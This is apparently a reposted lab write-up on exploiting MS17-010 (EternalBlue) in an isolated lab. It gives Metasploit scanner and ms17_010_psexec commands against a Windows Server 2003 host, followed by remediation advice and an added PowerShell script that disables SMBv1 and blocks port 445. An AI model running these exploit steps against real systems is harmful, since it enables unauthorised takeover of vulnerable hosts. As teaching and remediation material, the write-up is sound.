
MS17-010 exploitation summary

2022-06-26 12:06:00 Hour 1

1. What is MS17-010?

  1. MS17-010 is what we usually call EternalBlue. It broke out on the night of Friday, 14 April 2017. It exploits a vulnerability in the SMB protocol of Windows systems to obtain the highest privileges on the system and thereby take control of the compromised computer. On 12 May 2017 the WannaCry ransomware, built by modifying EternalBlue, hit victims all over the world, including schools, large enterprises, government and other institutions; files could only be recovered by paying a high ransom. Soon after the virus appeared, Microsoft patched the vulnerability.
  2. The flaw lies in the Windows SMBv1 kernel-mode function srv!SrvOs2FeaListToNt: while converting FEA (File Extended Attributes) it overflows a buffer in the large non-paged kernel pool (a kernel data structure, the Large Non-Paged Kernel Pool). When srv!SrvOs2FeaListToNt converts an FEA list into an NTFEA (Windows NT FEA) list, it calls srv!SrvOs2FeaListSizeToNt to calculate the size of the converted FEA list.

2. Environment setup

  1. Kali Linux
    IP: 192.168.3.188
    Tools: Metasploit
  2. Windows Server 2003
    IP: 192.168.3.187
    Port: 445 open

3. Exploitation steps

  1. Start MSF on Kali by entering the command msfconsole.

  2. Run search ms17_010 to find the available exploits, as shown below:
     (screenshot omitted)

  3. First use the fourth module in the results to check whether the vulnerability is present:
    use auxiliary/scanner/smb/smb_ms17_010
    After confirming that the target is vulnerable, use the exploit module.

  4. The exploit used is:
    exploit/windows/smb/ms17_010_psexec

  5. Use the command show options to view the parameters that need to be set; only the target IP is required.
    Command: set rhosts 192.168.3.187

  6. Then run exploit. As shown below, a session is established successfully.
     (screenshot omitted)

  7. At this point the vulnerability has been exploited successfully and control of the Windows Server 2003 host is obtained, as shown below:
     (screenshot omitted)

4. Remediation
Apply Microsoft's official patch for this vulnerability, or, if the SMB service is not used, close port 445.
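As an added example that is not part of the original post, the following PowerShell script audits a Windows host for the conditions the remediation above addresses (SMBv1 server enabled, inbound TCP 445 reachable) and applies the fixes. It assumes Windows 8 / Server 2012 or later (where the SmbShare and NetSecurity modules exist; the Server 2003 target in this lab has neither) and an elevated session; the function names are the example's own.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original post. Assumes Windows 8 / Server 2012 or later
# (SmbShare and NetSecurity modules present) and an elevated PowerShell session.
param([switch]$BlockPort445)  # opt in: only for hosts that must not serve SMB at all

function Get-SmbExposure {
    # Effective SMBv1 server setting, the LanmanServer registry override, and whether an
    # enabled inbound block rule already covers TCP 445.
    $cfg = Get-SmbServerConfiguration
    $reg = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
                            -Name SMB1 -ErrorAction SilentlyContinue
    $blocked = Get-NetFirewallRule -Direction Inbound -Action Block -Enabled True -ErrorAction SilentlyContinue |
        Get-NetFirewallPortFilter |
        Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -contains '445' }
    [pscustomobject]@{
        Smb1Enabled    = $cfg.EnableSMB1Protocol
        RegistrySmb1   = if ($null -ne $reg) { $reg.SMB1 } else { 'not set (default: enabled)' }
        Port445Blocked = [bool]$blocked
    }
}

function Disable-Smb1Server {
    # Turn off the SMBv1 server component (the code path srv!SrvOs2FeaListToNt belongs to);
    # SMBv2/v3 shares keep working. Clients that only speak SMBv1 will lose access.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
}

function Block-InboundSmb {
    # For hosts that do not serve SMB at all: block TCP 445 in the host firewall.
    New-NetFirewallRule -DisplayName 'Block inbound SMB (TCP 445)' -Direction Inbound `
        -Protocol TCP -LocalPort 445 -Action Block | Out-Null
}

$before = Get-SmbExposure
Write-Output "Before: SMBv1=$($before.Smb1Enabled) registry=$($before.RegistrySmb1) 445 blocked=$($before.Port445Blocked)"
if ($before.Smb1Enabled) { Disable-Smb1Server }
if ($BlockPort445 -and -not $before.Port445Blocked) { Block-InboundSmb }
$after = Get-SmbExposure
Write-Output "After:  SMBv1=$($after.Smb1Enabled) 445 blocked=$($after.Port445Blocked)"
```

Disabling SMBv1 removes the vulnerable code path but is not a substitute for installing the MS17-010 update on every host that still runs the affected driver.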


Copyright notice
This article was written by [Hour 1]. Please include a link to the original when reposting. Thanks.
https://yzsam.com/2022/02/202202170527315118.html